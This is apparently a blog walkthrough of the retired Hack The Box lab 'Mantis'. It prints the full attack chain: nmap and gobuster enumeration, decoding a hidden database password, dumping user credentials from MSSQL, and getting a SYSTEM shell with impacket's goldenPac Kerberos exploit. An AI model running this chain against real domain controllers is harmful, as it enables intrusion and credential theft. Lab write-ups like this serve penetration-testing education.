htb-mantis-nl

Today we are going to solve another CTF challenge “Mantis” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of Penetration testing. Let start and learn how to analyze any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Mantis is 10.10.10.52 so let’s initiate with nmap port enumeration.

root@kali# nmap -sC -sV -oA nmap 10.10.10.52
# Nmap 7.70 scan initiated Tue May 7 13:08:49 2019 as: nmap -sC -sV -oA nmap 10.10.10.52
Nmap scan report for 10.10.10.52
Host is up (0.032s latency).
Not shown: 980 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-05-07 17:09:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info: 
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
| DNS_Tree_Name: htb.local
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-05-05T21:17:25
|_Not valid after: 2049-05-05T21:17:25
|_ssl-date: 2019-05-07T17:10:12+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49167/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 48m02s, deviation: 1h47m21s, median: 1s
| ms-sql-info: 
| 10.10.10.52:1433: 
| Version: 
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery: 
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2019-05-07T13:10:15-04:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2019-05-07 13:10:12
|_ start_date: 2019-05-05 17:15:54

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 7 13:11:40 2019 -- 1 IP address (1 host up) scanned in 170.33 seconds

From the given below image, you can observe we found so many ports are open in the victim’s network.

First of all, we browse target IP through port 1337 in our web browser and saw following the image of IIS7 and although here I didn’t get any clue for next step therefore automatically next I move for directory buster.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on //10.10.10.52:1337

root@kali:~/htb/mantis# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.52:1337 -o gobuster-mantis.log

=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.52:1337/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/08 06:22:22 Starting gobuster
=====================================================
/secure_notes (Status: 301)

As result, I found a directory /secure notes

Here I saw two files dev_notes and web.config among these I’m interested in dev_notes test file to let’s open it.

When I open a dev_notes text file I read following contents as shown in below image and realize that it points towards a database “orcharddb” have “admin” as username, now I only need to know the required password for login into the database.

To me, the file “/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt” was looking suspicious as “NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx” was base 64 encoded, therefore, I need to decode this text for the correct assumption of getting the password.

root@kali:~/htb/mantis# curl http://10.10.10.52:1337/secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
1. Download OrchardCMS
2. Download SQL server 2014 Express ,create user "admin",and create orcharddb database
3. Launch IIS and add new website and point to Orchard CMS folder location.
4. Launch browser and navigate to http://localhost:8080
5. Set admin password and configure sQL server connection string.
6. Add blog pages with admin user.

Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt contains some base64-encoded text.

root@kali:~/htb/mantis# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421

This looks like a hex string. Let’s convert it to ASCII:

root@kali:~/htb/mantis# echo 6d2424716c5f53405f504073735730726421 | xxd -r -p
m$$ql_S@_P@ssW0rd!

After decoding the above hex text finally I found a password for admin user.

Using mssqlclient.py we are going to connect to ms SQL server . Now let login into the database using database name and above-found credential via port 1433

root@kali:~/htb/mantis# ./mssqlclient.py htb.local/admin@10.10.10.52
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: m$$ql_S@_P@ssW0rd!
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208) 
[!] Press help for extra shell commands
SQL> select @@version
Microsoft SQL Server 2014 - 12.0.2000.8 (X64) 
Feb 20 2014 20:04:26 
Copyright (c) Microsoft Corporation
Express Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) (Hypervisor)
SQL> SELECT name FROM master..sysdatabases
master 
tempdb 
model 
msdb 
orcharddb 
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord '
Id 
UserName 
Email 
NormalizedUserName 
Password 
PasswordFormat 
HashAlgorithm 
PasswordSalt 
RegistrationStatus 
EmailStatus 
EmailChallengeToken 
CreatedUtc 
LastLoginUtc 
LastLogoutUtc 
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
admin 
AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A== 
James 
J@m3s_P@ssW0rd! 
SQL>

We had manually added target IP with htb.local and matis.htb.local the domain names which we have found through nmap in our local host file.

Then we have installed impacket from git hub as given below command.

git clone https://github.com/CoreSecurity/impacket.git

Impacket contains goldenpac python file which is used for post exploitation, now execute given below command and access the victim’s terminal.

root@kali:~/htb/mantis# goldenPac.py htb.local/james@mantis.htb.local
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

Password: J@m3s_P@ssW0rd!
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file wGWklYmG.exe
[*] Opening SVCManager on mantis.htb.local.....
[*] Creating service AgUh on mantis.htb.local.....
[*] Starting service AgUh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\james\Desktop>type user.txt
8a8*****54d

c:\Users\Administrator\Desktop>type root.txt
209*****567

Author:  Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *